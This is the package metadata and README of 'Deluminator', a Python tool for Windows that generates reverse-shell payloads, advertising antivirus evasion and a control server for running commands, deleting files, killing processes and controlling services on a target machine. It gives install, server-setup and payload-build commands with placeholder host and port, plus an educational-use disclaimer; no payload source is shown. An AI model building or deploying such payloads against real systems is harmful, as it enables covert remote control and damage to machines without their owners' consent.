Metadata-Version: 2.1
Name: Deluminator
Version: 1.0.0
Summary: This package is a reverse shell generator for Windows systems that uses sockets to establish a connection. It is highly capable of bypassing antivirus software. The package includes a control server and comes with a number of useful features.
Author: Harshdeep Singh
Author-email: ishu.cxx@gmail.com
License: BSD-3-Clause
Description-Content-Type: text/markdown
License-File: License
Requires-Dist: click
Requires-Dist: pyinstaller
Requires-Dist: pyautogui

# Deluminator

[![License](https://img.shields.io/badge/License-BSD-red.svg)](https://github.com/t3l3machus/hoaxshell/blob/main/LICENSE.md)
<img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">

## Description
This package is a reverse shell generator for Windows systems that uses sockets to establish a connection. It is highly capable of bypassing antivirus software. The package includes a control server and comes with a number of useful features.  

## Features
- Root shell `Coming soon`
- System information
- Delete files & folder on the host machine. 
- Execute commands on target machine. 
- Upload/Download any type of files. `Coming soon`
- Get all processes running in a system.
- Kill process by name, id etc...
- Enable/Disable windows services.
- Start/Stop windows service.
- Start/Restart windows system.
- Screenshot `Coming soon`

## How to install
```
pip install deluminator
```  

## Setup Server
```
python aurora.py server --help
```
```
python aurora.py server --host <HOST> --port <PORT>
```

## Build Payload
```
python aurora.py payload --help
```
```
python aurora.py payload --name <NAME> --host <HOST> --port <PORT> --time <RECONNECTION TIME>
```

## Disclaimer
This tool is for educational and testing purposes only. Do not use its payloads on hosts without proper authorization. You are responsible for any consequences resulting from its use.
